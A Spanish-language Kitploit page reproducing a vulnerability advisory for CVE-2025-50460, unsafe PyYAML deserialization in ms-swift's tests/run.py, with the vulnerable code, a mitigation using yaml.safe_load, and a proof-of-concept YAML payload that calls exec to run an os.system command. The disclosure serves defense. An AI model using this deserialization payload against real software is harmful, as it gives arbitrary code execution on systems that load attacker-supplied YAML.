Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-50460 — Detalles técnicos y exploit para CVE-2025-50460 | Kitploit
Herramientas/GitHubGitHub/anchor0221/cve-2025-50460
Análisis EstáticoAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónPapers e InvestigaciónAprendizaje y Educación
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

Detalles técnicos y exploit para CVE-2025-50460

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-50460: Ejecución Remota de Código en modelscope/ms-swift mediante deserialización insegura de PyYAML

Estado: Pendiente de Análisis
Este registro CVE ha sido marcado para esfuerzos de enriquecimiento de NVD.

Existe una vulnerabilidad de ejecución remota de código (RCE) en el proyecto ms-swift versión 3.3.0 debido a una deserialización insegura en tests/run.py usando yaml.load() de la biblioteca PyYAML (versiones = 5.3.1). Si un atacante puede controlar el contenido del archivo de configuración YAML pasado al parámetro --run_config, se puede ejecutar código arbitrario durante la deserialización. Esto puede llevar a un compromiso total del sistema. La vulnerabilidad se desencadena cuando se carga un archivo YAML malicioso, permitiendo la ejecución de comandos arbitrarios de Python como os.system(). Se recomienda actualizar PyYAML a la versión 5.4 o superior, y usar yaml.safe_load() para mitigar el problema.

Descripción

Existe una vulnerabilidad de ejecución remota de código (RCE) en el proyecto modelscope/ms-swift debido al uso inseguro de yaml.load() en combinación con versiones vulnerables de la biblioteca PyYAML (≤ 5.3.1). El problema reside en el script tests/run.py, donde un archivo de configuración YAML proporcionado por el usuario se deserializa usando yaml.load() con yaml.FullLoader.

Descargar herramienta

Si un atacante puede controlar o reemplazar el archivo de configuración YAML proporcionado al argumento --run_config, puede inyectar una carga maliciosa que resulte en la ejecución de código arbitrario.

Repositorio Afectado

  • Proyecto: modelscope/ms-swift
  • Versiones afectadas: última
  • Archivo: tests/run.py
  • Enlace permanente de GitHub: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Dependencia: PyYAML <= 5.3.1

Código Vulnerable

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Prueba de Concepto (PoC)

Paso 1: Crear archivo YAML malicioso (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Paso 2: Ejecutar con PyYAML vulnerable (<= 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

Esto resulta en la ejecución de os.system, demostrando la ejecución de código.

Mitigación

  • Reemplazar yaml.load() con yaml.safe_load()
  • Actualizar PyYAML a la versión 5.4 o posterior

Ejemplo de corrección:

root@kitploit:~
# Antes
yaml.load(f, Loader=yaml.FullLoader)

# Después
yaml.safe_load(f)

Estado del CVE

CampoValor
ID CVECVE-2025-50460
Puntuación CVSSTBD
CWECWE-502: Deserialización de datos no confiables
Fecha de informe2025-04-25
Fecha de divulgación2025-07-30
Versión afectadaúltima
Versión corregida

Autor

  • Descubierto por: Yu Rong (戎誉) y Hao Fan (凡浩)
  • Contacto: [[email protected] ]